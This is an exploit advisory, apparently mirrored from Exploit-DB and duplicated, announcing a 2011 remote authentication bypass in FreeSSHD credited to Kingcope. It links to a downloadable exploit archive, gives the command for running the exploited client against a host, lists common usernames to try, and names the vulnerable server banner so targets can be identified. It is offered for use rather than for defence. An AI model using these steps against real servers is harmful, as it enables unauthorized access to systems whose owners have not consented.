71 lines
No EOL
913 B
Text
71 lines
No EOL
913 B
Text
FreeSSHD all version Remote Authentication Bypass ZERODAY
|
|
Discovered & Exploited by Kingcope
|
|
Year 2011
|
|
|
|
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23080.zip
|
|
|
|
Run like:
|
|
|
|
ssh.exe -l<valid username> <host>
|
|
|
|
valid username might be:
|
|
|
|
root
|
|
admin
|
|
administrator
|
|
webadmin
|
|
sysadmin
|
|
netadmin
|
|
guest
|
|
user
|
|
web
|
|
test
|
|
ssh
|
|
sftp
|
|
ftp
|
|
|
|
or anything you can imagine.
|
|
|
|
|
|
The vulnerable banner of the most recent version is:
|
|
|
|
SSH-2.0-WeOnlyDo 2.1.3
|
|
|
|
|
|
For your pleasure,
|
|
|
|
KingcopeFreeSSHD all version Remote Authentication Bypass ZERODAY
|
|
Discovered & Exploited by Kingcope
|
|
Year 2011
|
|
|
|
Run like:
|
|
|
|
ssh.exe -l<valid username> <host>
|
|
|
|
valid username might be:
|
|
|
|
root
|
|
admin
|
|
administrator
|
|
webadmin
|
|
sysadmin
|
|
netadmin
|
|
guest
|
|
user
|
|
web
|
|
test
|
|
ssh
|
|
sftp
|
|
ftp
|
|
|
|
or anything you can imagine.
|
|
|
|
|
|
The vulnerable banner of the most recent version is:
|
|
|
|
SSH-2.0-WeOnlyDo 2.1.3
|
|
|
|
|
|
For your pleasure,
|
|
|
|
Kingcope |